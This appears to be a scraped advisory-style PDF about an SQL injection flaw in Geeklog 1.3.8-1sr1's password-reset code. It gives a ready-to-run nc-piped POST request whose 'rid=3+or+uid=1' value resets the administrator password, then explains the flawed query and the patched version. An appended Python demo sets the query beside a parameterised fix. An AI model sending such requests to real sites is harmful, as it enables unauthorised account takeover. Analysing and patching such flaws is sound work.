
Sql Injection Exploit Code

Pages: 2      File type: pdf      Size: 84.98 KB      Views: 20      Downloads: 0
Content extracted from the document:
Sql Injection Exploit Code
hack site Geeklog version 1.3.8-1sr1

A few words about geeklog.net
http://www.geeklog.net/
This is a free-to-download portal package used very widely for news sites and the like; it is quite popular. The SQL injection bug was found in the file users.php.

2. Exploit code
Exploit:

#!/bin/sh
echo "POST /path/to/gl/users.php HTTP/1.0
Content-length: 50
Content-type: application/x-www-form-urlencoded

mode=setnewpwd&passwd=new&uid=2&rid=3+or+uid=1&" | nc localhost 80

This should change the Admin user's password to "new". You have to change /path/to/gl/users.php according to your Geeklog installation.

Immune systems:
* Geeklog version 1.3.8-1sr2

The exploit above uses the "forgot password" feature introduced in Geeklog 1.3.8. By constructing a certain kind of HTTP request, an attacker can change any user's Geeklog password, including the administrator password. This is because of an SQL injection problem. In users.php we have this kind of code (around line 750):

if (!empty($uid) && is_numeric($uid) && !empty($reqid)) {
    $valid = DB_count($_TABLES['users'], array('uid', 'pwrequestid'),
                      array($uid, $reqid));
    if ($valid == 1) {
        // generate an md5 hash for the new password and change it
    } else {
        // invalid request, display error message
    }
}

The database layer hides the actual SQL queries, so this does not look very clear yet, but if we log all SQL queries executed we see that the above code produces this SQL (with e.g. $uid=2 and $reqid=3):

SELECT COUNT(*) FROM gl_users WHERE uid = 2 AND pwrequestid = 3

The password is changed only if the count returned by this query is exactly one. The only check done for $reqid is that it is not empty. It can contain anything, so if $reqid is changed to e.g. "3 or uid=1" the SQL server will get this query instead:

SELECT COUNT(*) FROM gl_users WHERE uid = 2 AND pwrequestid = 3 or uid=1

The pwrequestid = 3 condition is false unless the admin user really forgot the password and is using this feature at the same time (very unlikely). However, because of the "or uid=1" part, the query will still return one, because a user with uid=1 exists (the Anonymous user). So the $valid variable in the above code is set to one and the password is changed.

This of course has nothing to do with displaying error messages. The exploit does not produce any error message because the SQL code above is correct.

Jouko has informed the Geeklog developers about this and they have released a fixed version, see http://www.geeklog.net/
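To make the reasoning above concrete, here is an added example (not code from the advisory or from Geeklog) that rebuilds the logged DB_count query over a constructed in-memory SQLite table and sets it beside a hardened version. The table layout, the digit-only check on the request id and the parameterised query are assumptions for illustration, not Geeklog's actual fix.

```python
import sqlite3


def make_db(admin_pwrequestid=None):
    """Constructed gl_users table with the two rows the advisory relies on:
    uid 1 is the Anonymous user, uid 2 is Admin. admin_pwrequestid simulates
    whether Admin currently has a pending "forgot password" request."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE gl_users (uid INTEGER PRIMARY KEY, "
               "username TEXT, pwrequestid INTEGER)")
    db.executemany("INSERT INTO gl_users VALUES (?, ?, ?)",
                   [(1, "Anonymous", None), (2, "Admin", admin_pwrequestid)])
    return db


def db_count_vulnerable(uid, reqid, admin_pwrequestid=None):
    """Mirrors the SQL the advisory logged for the original DB_count call:
    uid passed is_numeric(), but reqid is pasted into the query verbatim,
    so it can carry an extra OR clause."""
    db = make_db(admin_pwrequestid)
    sql = (f"SELECT COUNT(*) FROM gl_users WHERE uid = {int(uid)} "
           f"AND pwrequestid = {reqid}")
    return db.execute(sql).fetchone()[0]


def db_count_fixed(uid, reqid, admin_pwrequestid=None):
    """Hardened variant (an assumption, not Geeklog's patch): the request id
    must be a plain integer and both values are bound as parameters."""
    if not (str(uid).isdigit() and str(reqid).isdigit()):
        return 0
    db = make_db(admin_pwrequestid)
    sql = "SELECT COUNT(*) FROM gl_users WHERE uid = ? AND pwrequestid = ?"
    return db.execute(sql, (int(uid), int(reqid))).fetchone()[0]


def password_would_change(count):
    """users.php only resets the password when the count is exactly one."""
    return count == 1


if __name__ == "__main__":
    forged = "3 or uid=1"  # the rid value from the advisory
    print("vulnerable, forged rid:", db_count_vulnerable(2, forged))  # 1
    print("fixed, forged rid:     ", db_count_fixed(2, forged))       # 0
    print("fixed, genuine request:", db_count_fixed(2, 3, 3))         # 1
```

With the unmodified query the forged request id yields a count of one purely from the Anonymous row, which is exactly the condition users.php treats as a valid reset; the hardened variant only returns one when Admin really has a matching pending request.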